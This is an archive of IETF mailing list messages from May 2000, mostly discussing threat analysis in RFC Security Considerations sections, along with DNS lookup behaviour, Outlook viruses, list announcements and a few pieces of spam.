->>->Cc: [EMAIL PROTECTED]
->>->Subject: RE: Storage over Ethernet/IP
->>
->>->The point being made, remade and made again here is:
->>->- Any protocol that offers no means of countering such
->>->security threats is
->>->broken, and should not be considered for standardization.
->>
->>->It is perfectly possible that after conducting a threat
->and modality
->>->analysis, one ends up with saying that hardware-accelerated
->>->IPsec using
->>->host identities is adequate for the scenarios involving
->>->otherwise-unprotected Internet links, and that a mode with no
->>->protection is
->>->adequate when the media is physically secured.
->>->
->>->But the analysis MUST BE DONE.
->>->
->>
->>is vulnerability and threat analysis part of the
->>standardization process ??
->>
->Yes, in order to come up with a reasonable security considerations
->section. (Clearly, much of it is site-specific. But the protocol
->developers can't ignore it.)
->
->
-> --Steve Bellovin
->
OK...but nowhere in rfc2401/2402 do the STD doc's specify
finding's of the security /threat analysis, so how does
one state that the std doc, is within the reasonable limits
to counter "such threats and security" ??
/pd
>From owner-ietf-outbound Mon May 29 14:50:16 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA02643
for [EMAIL PROTECTED]; Mon, 29 May 2000 14:50:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA02579
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 14:42:25 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id OAA07262;
Mon, 29 May 2000 14:42:23 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: "Dawson, Peter D" <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
In-reply-to: Your message of "Mon, 29 May 2000 17:02:10 -0000."
<[EMAIL PROTECTED]>
Date: Mon, 29 May 2000 14:42:23 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> is vulnerability and threat analysis part of the
> standardization process ??
yes.
>From owner-ietf-outbound Mon May 29 15:00:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA02761
for [EMAIL PROTECTED]; Mon, 29 May 2000 15:00:03 -0400 (EDT)
Received: from newdev.harvard.edu (newdev.eecs.harvard.edu [140.247.60.212])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA02593
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 14:43:26 -0400 (EDT)
Received: (from sob@localhost)
by newdev.harvard.edu (8.9.3/8.9.3) id OAA06315;
Mon, 29 May 2000 14:43:25 -0400 (EDT)
Date: Mon, 29 May 2000 14:43:25 -0400 (EDT)
From: Scott Bradner <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: RE: Storage over Ethernet/IP
X-Loop: [EMAIL PROTECTED]
Peter - for the last few years the IESG has required IETF working groups
to have meaningful Security Considerations sections in standards
track RFCs - these must include a threat and security analysis
Scott
>From owner-ietf-outbound Mon May 29 15:20:15 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA03046
for [EMAIL PROTECTED]; Mon, 29 May 2000 15:20:02 -0400 (EDT)
Received: from unni.dsv.su.se (unni.dsv.su.se [130.237.161.27])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA02990
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 15:13:53 -0400 (EDT)
Received: from [130.237.150.138] (jph1.dsv.su.se [130.237.150.138])
by unni.dsv.su.se (8.9.3+Sun/8.9.3) with ESMTP
id VAA05245 for <[EMAIL PROTECTED]>;
Mon, 29 May 2000 21:13:52 +0200 (MET DST)
Mime-Version: 1.0
Message-Id: <v04210106b558721066e3@[130.237.150.138]>
Date: Mon, 29 May 2000 21:16:28 +0200
To: IETF general mailing list <[EMAIL PROTECTED]>
From: Jacob Palme <[EMAIL PROTECTED]>
Subject: New mailing list on legal control of the Internet
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
Eric Thomas has helped me start a mailing list on legal
control of the Internet.
The NETLAW mailing list is open for discussion of which
laws and which kind of legal control of the Internet is
wanted or not wanted. Should Internet service providers
help the police? Should we rather use self-control? Which
uses of the net should we act against? Virus distribution?
Mail bombing, ping attacks and other denial of service
attacks? Cracking? Spamming?
The list can also be used to report about laws controlling
the Internet in various countries, both laws you like and
laws you dislike.
To subscribe, send an email to [EMAIL PROTECTED] with
the following text in the body of the message:
SUB NETLAW <your name>
where you replace <your name> with your name, not your e-mail address.
Archives at http://segate.sunet.se/archives/netlaw.html
More info at http://dsv.su.se/jpalme/society/netlaw.html
--
Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
for more info see URL: http://www.dsv.su.se/jpalme/
>From owner-ietf-outbound Mon May 29 16:40:54 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA03755
for [EMAIL PROTECTED]; Mon, 29 May 2000 16:40:02 -0400 (EDT)
Received: from dokka.maxware.no (dokka.maxware.no [195.139.236.69])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA03723
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 16:37:28 -0400 (EDT)
Received: from langfjella.Alvestrand.no ([10.128.167.143])
by dokka.maxware.no (8.9.3/8.9.3) with ESMTP id WAA32727;
Mon, 29 May 2000 22:37:18 +0200
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Mon, 29 May 2000 22:33:59 +0200
To: "Dawson, Peter D" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
From: Harald Tveit Alvestrand <[EMAIL PROTECTED]>
Subject: RE: Storage over Ethernet/IP
In-Reply-To: <[EMAIL PROTECTED]
ld.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 17:02 29.05.2000 +0000, Dawson, Peter D wrote:
>is vulnerability and threat analysis part of the
>standardization process ??
Yes.
RFC 2223, "Instructions to RFC authors", section 9.
See also RFC 2316, "Report from the IAB security workshop", section 9,
which gives further guidance.
Harald
--
Harald Tveit Alvestrand, EDB Maxware, Norway
[EMAIL PROTECTED]
>From owner-ietf-outbound Mon May 29 22:30:29 2000
Received: by ietf.org (8.9.1a/8.9.1a) id WAA06709
for [EMAIL PROTECTED]; Mon, 29 May 2000 22:30:03 -0400 (EDT)
Received: from tcb.net (tcb.net [205.168.100.1])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id WAA06680
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 22:29:55 -0400 (EDT)
Received: from sofos.tcb.net (sofos.tcb.net [127.0.0.1])
by tcb.net (8.9.3/8.9.3) with ESMTP id UAA04186
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 20:31:13 -0600
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
From: Danny McPherson <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
Subject: Directed Broadcasts
Date: Mon, 29 May 2000 20:31:12 -0600
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
[Apologies in advance for the use of this distribution list,
I need to ensure that I cover as many work areas as possible]
That said, I wanted to ask if folks that are aware of real uses
for "directed broadcasts" in networks today could let me know of
the use. I'm aware of a few (e.g. the Mobile IP stuff and smurf
amplifiers), but am certain I'm overlooking others.
If you're aware of anything that is using (or intends to use)
directed broadcast, could you please send me a PRIVATE email
message.
Thanks!
-danny
>From owner-ietf-outbound Tue May 30 01:50:15 2000
Received: by ietf.org (8.9.1a/8.9.1a) id BAA14508
for [EMAIL PROTECTED]; Tue, 30 May 2000 01:50:02 -0400 (EDT)
Received: from perq.cac.washington.edu (c986708-b.sttln1.wa.home.com [24.11.162.150])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id BAA14471
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 01:48:45 -0400 (EDT)
Received: from localhost (rlmorgan@localhost)
by perq.cac.washington.edu (8.9.3/8.9.3) with ESMTP id WAA13519;
Mon, 29 May 2000 22:49:10 -0700
X-Authentication-Warning: perq.cac.washington.edu: rlmorgan owned process doing -bs
Date: Mon, 29 May 2000 22:49:10 -0700 (PDT)
From: "RL 'Bob' Morgan" <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
Reply-To: "RL 'Bob' Morgan" <[EMAIL PROTECTED]>
To: "Dawson, Peter D" <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: RE: Storage over Ethernet/IP
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
> is vulnerability and threat analysis part of the standardization
> process ??
RFCs 2251-2256, which specify LDAPv3, carry a stern warning up front that
that these documents lack a standard mandatory-to-implement strong
authentication method, hence limiting the applicability of the protocol
(how much effect this warning has had in practice is hard to say, of
course). New documents have been written that do indeed do a
vulnerability analysis, not in any great depth but enough to motivate the
mechanisms recommended to deal with the identified threats. In particular
see RFC 2829 (which should appear any minute now,
draft-ietf-ldapext-authmeth-04.txt in the mean time).
- RL "Bob"
>From owner-ietf-outbound Tue May 30 07:00:22 2000
Received: by ietf.org (8.9.1a/8.9.1a) id HAA23622
for [EMAIL PROTECTED]; Tue, 30 May 2000 07:00:02 -0400 (EDT)
Received: from gtranz.com ([216.231.39.215])
by ietf.org (8.9.1a/8.9.1a) with SMTP id GAA23545
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 06:57:21 -0400 (EDT)
From: [EMAIL PROTECTED]
Date: Tue, 30 May 2000 06:58:02 -0800
Subject: Free eCommerce Store
Message-Id: <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8BIT
To: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8BIT
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8BIT
-------------------------------------------------------------------
This mail is never sent unsolicited. This is a PostMasterDirect.com
mailing! You have subscribed to receive this information at Internet.com.
To unsubscribe forward this message to [EMAIL PROTECTED]
To mail to lists, go to http://www.PostMasterDirect.com/
-------------------------------------------------------------------
Put your business online, instantly. gTranz provides you with the tools to build,
manage and grow your online business, including:
· An easy-to-use store-builder
· Site hosting
· Real time credit card processing
· Tax and shipping calculators
· Unlimited categories and items
· In-depth reporting functions
· Merchant account services
· Search Engine Submission
· Domain Name Registration
· Banner advertising
· Procurement services
And much more.
Special Offer:
If you respond to this ad within the next 30 days, we will:
1. Give you a 30 day FREE trial
2. Transfer your existing site into our solution
3. Provide full telephone support
To take advantage of our special offer visit www.gtranz.com, sign-up, and start
building your online store. It’s that simple.
Business Partners wanted:
Become a gTranz partner and earn revenue by providing gTranz’s e-commerce services to
your customers. For details about our various partnership and affiliate programs,
please visit www.gtranz.com/partners.html.
>From owner-ietf-outbound Tue May 30 08:30:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA26685
for [EMAIL PROTECTED]; Tue, 30 May 2000 08:30:02 -0400 (EDT)
Received: from poseidon.bwc.state.oh.us ([198.234.212.100])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA26545
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 08:22:20 -0400 (EDT)
Received: by poseidon.bwc.state.oh.us; id IAA17829; Tue, 30 May 2000 08:20:19 -0400
(EDT)
Received: from venus.bwc.state.oh.us(165.223.131.35) by neptune.bwc.state.oh.us via
smap (V5.0)
id xma017796; Tue, 30 May 00 08:19:40 -0400
Received: from mswg6.bwc.state.oh.us ([165.223.130.24])
by venus.bwc.state.oh.us (8.9.3/8.9.1) with ESMTP id IAA06188
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 08:26:28 -0400 (EDT)
Received: by MSWG6 with Internet Mail Service (5.5.2650.21)
id <L1K9CD1S>; Tue, 30 May 2000 08:20:44 -0400
Message-ID: <6FDE0867413DD21182BF00A0C972519204C98A1E@MSWG4>
From: "Morrisey Matthew J." <[EMAIL PROTECTED]>
To: "Morrisey Matthew J." <[EMAIL PROTECTED]>
Cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: RE: 48th IETF meeting in Pittsburgh, PA
Date: Tue, 30 May 2000 08:20:38 -0400
X-Mailer: Internet Mail Service (5.5.2650.21)
X-Loop: [EMAIL PROTECTED]
Not a lot there...
...yet.
Guess i'm planning to early?
Does anyone know who the sponsor is?
> -----Original Message-----
> From: Fred Baker [SMTP:[EMAIL PROTECTED]]
> Sent: Friday, May 26, 2000 7:47 PM
> To: Morrisey Matthew J.
> Cc: '[EMAIL PROTECTED]'
> Subject: Re: 48th IETF meeting in Pittsburgh, PA
>
> At 10:15 AM 5/25/00 -0400, Morrisey Matthew J. wrote:
> >Where can i find more info?
>
> have you checked www.ietf.org?
>From owner-ietf-outbound Tue May 30 09:31:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA28307
for [EMAIL PROTECTED]; Tue, 30 May 2000 09:30:02 -0400 (EDT)
Received: from atkielski.com (atkielski.com [161.58.232.69])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA28231
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 09:26:06 -0400 (EDT)
Received: from AStLambert101214 (ASt-Lambert-101-2-14.abo.wanadoo.fr [193.251.59.14])
by atkielski.com (8.8.8) id PAA54072; Tue, 30 May 2000 15:26:06 +0200 (CEST)
Message-ID: <007b01bfca3a$9c54a490$[EMAIL PROTECTED]>
From: "Anthony Atkielski" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Subject: Re: still no Outlook patch
Date: Tue, 30 May 2000 15:25:31 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6600
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
From: "James Salsman" <[EMAIL PROTECTED]>
Sent: Monday, May 29, 2000 02:12
Subject: RE: still no Outlook patch
> The fact that they still have some people who
> have suggested it is not helping them avoid
> the "predatory" label.
Only among those with a poor understanding of the software issues, I
daresay. I think, in this case (as in most), it is a question of poor or
questionable product design, not predation.
Microsoft, like just about every other microcomputer software publisher,
gives priority to feature bloat over security. This is an economic
necessity, because the need to sell upgrades and versions to survive
requires that a software publisher find reasons to entice customers to
replace software that already does the job with new software that does the
same thing. Customers may whine about security, but they won't pay for it,
and they find it a nuisance when they see it in the products they buy (even
mainframe customers tend to be this way, but microcomputer users are much,
much worse in this respect). Build lots of new features of dubious utility
into a product and you'll be able to persuade at least some people to buy an
upgrade that they don't really need; build security into a product and a lot
of people will stick with the old version just to avoid the inconvenience of
the new security features. Additionally, while it is difficult to prove
that a publisher has not lived up to its promise with respect to new and
often useless features, it is much easier to prove that a publisher has
messed something up if it promises security and fails to deliver--so it's
best not to promise security in the first place.
Anyway, I'm not sure what any of this has to do with the Internet, apart
from a loose connection to recent problems with viruses that have propagated
via e-mail sent (incidentally) over the Internet. Even then, in these
specific, recent cases, the viruses spread because individual users were too
stupid to reflect before opening just any old attachment that they see (even
after repeated warnings); and so, if any fingers must be pointed, I suggest
that they be pointed at the end users, not at vendors, ISPs, the IETF, or
anyone else. There's a limit to how completely any software can protect
against stupidity and still fulfill a useful purpose.
-- Anthony
>From owner-ietf-outbound Tue May 30 10:11:22 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA29309
for [EMAIL PROTECTED]; Tue, 30 May 2000 10:10:02 -0400 (EDT)
Received: from netcreations.com (netcreations.com [208.156.32.204])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA29201
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 10:04:39 -0400 (EDT)
Received: from review.postmasterdirect.com ([10.16.35.1]) by NetCreations.com with
SMTP id <26154625-28588>; Tue, 30 May 2000 10:04:33 -0400
From: "SubscriptionBot" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: Your subscription list review password
Message-Id: <[EMAIL PROTECTED]>
Date: Tue, 30 May 2000 10:04:29 -0400
X-Loop: [EMAIL PROTECTED]
Your subscription profile is ready for review! Please click on the link below
to enter your account:
http://review.postmasterdirect.com/l?[EMAIL PROTECTED]&p=6886
If the link above doesn't work for you, please visit
http://review.postmasterdirect.com/l.mhtml
and enter your email address and password. Your password is: 6886
Thank you!
>From owner-ietf-outbound Tue May 30 10:21:23 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA29556
for [EMAIL PROTECTED]; Tue, 30 May 2000 10:20:03 -0400 (EDT)
Received: from inner.net (avarice.inner.net [199.33.248.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA29312
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 10:10:04 -0400 (EDT)
Received: from wasp.inet.org ([216.52.8.30])
by inner.net (8.7.6/8.9.3) with ESMTP id NAA09603;
Tue, 30 May 2000 13:59:04 GMT
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58
Date: Tue, 30 May 2000 10:09:48 +0100
To: "Dawson, Peter D" <[EMAIL PROTECTED]>
From: RJ Atkinson <[EMAIL PROTECTED]>
Subject: RE: Storage over Ethernet/IP
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]
ld.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 18:02 29-05-00 , Dawson, Peter D wrote:
>is vulnerability and threat analysis part of the
>standardization process ??
YES (shouting intentional).
The "Security Considerations" section of every RFC ought to
contain vulnerability, threat analysis, risk mitigation,
and residual risk information.
Ran
[EMAIL PROTECTED]
>From owner-ietf-outbound Tue May 30 11:01:53 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA00425
for [EMAIL PROTECTED]; Tue, 30 May 2000 11:00:01 -0400 (EDT)
Received: from netcreations.com (netcreations.com [208.156.32.204])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA00300
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 10:53:41 -0400 (EDT)
Received: from review.postmasterdirect.com ([10.16.35.1]) by NetCreations.com with
SMTP id <26154593-28590>; Tue, 30 May 2000 10:53:39 -0400
From: "SubscriptionBot" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: Your subscription list review password
Message-Id: <[EMAIL PROTECTED]>
Date: Tue, 30 May 2000 10:53:33 -0400
X-Loop: [EMAIL PROTECTED]
Your subscription profile is ready for review! Please click on the link below
to enter your account:
http://review.postmasterdirect.com/l?[EMAIL PROTECTED]&p=6886
If the link above doesn't work for you, please visit
http://review.postmasterdirect.com/l.mhtml
and enter your email address and password. Your password is: 6886
Thank you!
>From owner-ietf-outbound Tue May 30 11:51:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA02156
for [EMAIL PROTECTED]; Tue, 30 May 2000 11:50:03 -0400 (EDT)
Received: from scoya.cnri.reston.va.us (scoya.cnri.reston.va.us [10.27.5.106])
by ietf.org (8.9.1a/8.9.1a) with SMTP id LAA02095
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 11:49:00 -0400 (EDT)
Date: Tue, 30 May 2000 11:48:54 -0400 (Eastern Daylight Time)
From: Steve Coya <[EMAIL PROTECTED]>
Reply-To: Steve Coya <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Subscription CRAP on the list
Message-ID: <[EMAIL PROTECTED]>
X-X-Sender: [EMAIL PROTECTED]
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
Folks,
For those who don't know better, please ignore the message sent from
[EMAIL PROTECTED] to the IETF list.
It did not originate from the IETF or the Secretariat.
Steve
>From owner-ietf-outbound Tue May 30 12:01:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA02749
for [EMAIL PROTECTED]; Tue, 30 May 2000 12:00:03 -0400 (EDT)
Received: from motgate.mot.com (motgate.mot.com [129.188.136.100])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA02688
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 11:59:24 -0400 (EDT)
Received: [from mothost.mot.com (mothost.mot.com [129.188.137.101]) by motgate.mot.com
(motgate 2.1) with ESMTP id IAA22494 for <[EMAIL PROTECTED]>; Tue, 30 May 2000 08:59:26
-0700 (MST)]
Received: [from il27exb01.cig.mot.com (il27exb01.cig.mot.com [136.182.15.100]) by
mothost.mot.com (MOT-mothost 2.0) with ESMTP id IAA24940 for <[EMAIL PROTECTED]>; Tue, 30
May 2000 08:59:26 -0700 (MST)]
Received: from email.mot.com (160.15.82.33 [160.15.82.33]) by il27exb01.cig.mot.com
with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)
id KP8KC9TW; Tue, 30 May 2000 10:59:25 -0500
Sender: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Date: Tue, 30 May 2000 17:04:19 +0000
From: Randall Stewart <[EMAIL PROTECTED]>
Organization: NAT
X-Mailer: Mozilla 4.7 [en] (X11; U; Linux 2.2.12-20 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: IETF Mailing List <[EMAIL PROTECTED]>
Subject: New OBAST mailing list
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Dear all:
A mailing list has been formed to discuss a
Open Base Station Protocol (OBAST). This
mailing list is a pre-cursor to a possible upcoming
BOF. If you are interested in this discussion
please join the list by subscribing as follows:
Send the following command in email to:
"[EMAIL PROTECTED]":
and in the body of your message
subscribe obast-list
or
subscribe obast-list myemail@address
other commands understood by majordomo are:
who obast-list
info obast-list
index obast-list
get obast-day-number-from-index
Note: You must be a member of the list to run the
above commands
Thanks
--
Randall R. Stewart
Member Technical Staff
Network Architecture and Technology (NAT)
847-632-7438 fax:847-632-6733
>From owner-ietf-outbound Tue May 30 20:21:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA13638
for [EMAIL PROTECTED]; Tue, 30 May 2000 20:20:02 -0400 (EDT)
Received: from redmailwall.attws.com (redmailwall.attws.com [199.108.253.115])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id TAA13312
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 19:56:54 -0400 (EDT)
Received: from viruswall.entp.attws.com (viruswall.entp.attws.com [155.176.34.36])
by redmailwall.attws.com (8.9.3/8.9.3) with ESMTP id RAA06463
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 17:01:31 -0700 (PDT)
Received: from nwestmail.nwest.attws.com by viruswall.entp.attws.com (8.8.8/AT&T
Wireless Services, Inc. V8 version 2)
id QAA14665; Tue, 30 May 2000 16:56:19 -0700 (PDT)
Received: from lizard.nwest.mccaw.com (lizard.nwest.attws.com [141.204.54.42])
by nwestmail.nwest.attws.com (8.8.8+Sun/8.8.8) with ESMTP id QAA21029
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 16:56:23 -0700 (PDT)
Received: (from dbunce@localhost)
by lizard.nwest.mccaw.com (8.8.6/8.8.6) id QAA07850
for [EMAIL PROTECTED]; Tue, 30 May 2000 16:56:21 -0700 (PDT)
Date: Tue, 30 May 2000 16:56:21 -0700 (PDT)
From: Daryl Bunce <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: Cite on DNS-related traffic.
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
I've often wondered how much of the overload is due to
browsers looking for XYZ.com, then looking for www.XYZ.com...
Just one of those things thought about in the wee hours.
>From owner-ietf-outbound Tue May 30 22:50:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id WAA16730
for [EMAIL PROTECTED]; Tue, 30 May 2000 22:50:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id WAA16707
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 22:45:54 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta1/8.11.0.Beta1) with ESMTP id e4V2ji923132;
Tue, 30 May 2000 22:45:44 -0400
Message-Id: <[EMAIL PROTECTED]>
To: Daryl Bunce <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: Cite on DNS-related traffic.
In-reply-to: Your message of "Tue, 30 May 2000 16:56:21 PDT."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
Date: Tue, 30 May 2000 22:45:44 -0400
X-Loop: [EMAIL PROTECTED]
On Tue, 30 May 2000 16:56:21 PDT, Daryl Bunce <[EMAIL PROTECTED]> said:
> I've often wondered how much of the overload is due to
> browsers looking for XYZ.com, then looking for www.XYZ.com...
> Just one of those things thought about in the wee hours.
I run an off-site secondary for another .edu's DNS. I once got
curious, and watched *WAY* too many lookups for (in quick sequence)
www.netscape.com.dept.other.edu
www.netscape.com.other.edu
www.netscape.com.edu
www.netscape.com
No, I don't know why I got the last one, as I'm only answering for
'other.edu'. Perhaps the host doing the queries had a sudden fit
of inspiration, saw my machine as an NS for its domain, and guessed.
Or maybe just some funky info in a DHCP config file someplace...
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Tue May 30 23:40:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id XAA17445
for [EMAIL PROTECTED]; Tue, 30 May 2000 23:40:03 -0400 (EDT)
Received: from mail2.rdc3.on.home.com (mail2.rdc3.on.home.com [24.2.9.41])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id XAA17399
for <[EMAIL PROTECTED]>; Tue, 30 May 2000 23:35:38 -0400 (EDT)
Received: from intruder ([24.114.219.42]) by mail2.rdc3.on.home.com
(InterMail vM.4.01.02.00 201-229-116) with SMTP
id <20000531033525.NZO1114.mail2.rdc3.on.home.com@intruder>;
Tue, 30 May 2000 20:35:25 -0700
From: Garreth Jeremiah <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
To: [EMAIL PROTECTED], Daryl Bunce <[EMAIL PROTECTED]>
Subject: Re: Cite on DNS-related traffic.
Date: Tue, 30 May 2000 23:33:13 -0400
X-Mailer: KMail [version 1.0.29]
Content-Type: text/plain
Cc: [EMAIL PROTECTED]
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
In-Reply-To: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Message-Id: <00053023364500.02459@intruder>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id XAA17399
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
Excuse me if this is answering the wron question here, but.....
This is just cycling through the clients "DNS Suffix search order", which is
clearly set to: dept.other.edu
it may be additionally set up for the others also, as the implimentation of the
resolver is obviously client dependent. After trying its "domain suffix's" it
will attempt to resolve the bare form of the host domain pair.
If I am totally off the mark here - sorry - it's late and the wife is
screaming for me to sleep as I have an early start tomorrow.
Garreth J Jeremiah
IT Specialist (Security)
On Tue, 30 May 2000, [EMAIL PROTECTED]
wrote: > On Tue, 30 May 2000 16:56:21 PDT, Daryl Bunce <[EMAIL PROTECTED]>
said: > > I've often wondered how much of the overload is due to
> > browsers looking for XYZ.com, then looking for www.XYZ.com...
> > Just one of those things thought about in the wee hours.
>
> I run an off-site secondary for another .edu's DNS. I once got
> curious, and watched *WAY* too many lookups for (in quick sequence)
>
> www.netscape.com.dept.other.edu
> www.netscape.com.other.edu
> www.netscape.com.edu
> www.netscape.com
>
> No, I don't know why I got the last one, as I'm only answering for
> 'other.edu'. Perhaps the host doing the queries had a sudden fit
> of inspiration, saw my machine as an NS for its domain, and guessed.
> Or maybe just some funky info in a DHCP config file someplace...
>
> Valdis Kletnieks
> Operating Systems Analyst
> Virginia Tech
>From owner-ietf-outbound Wed May 31 00:10:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id AAA17821
for [EMAIL PROTECTED]; Wed, 31 May 2000 00:10:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id AAA17735
for <[EMAIL PROTECTED]>; Wed, 31 May 2000 00:01:24 -0400 (EDT)
From: [EMAIL PROTECTED]
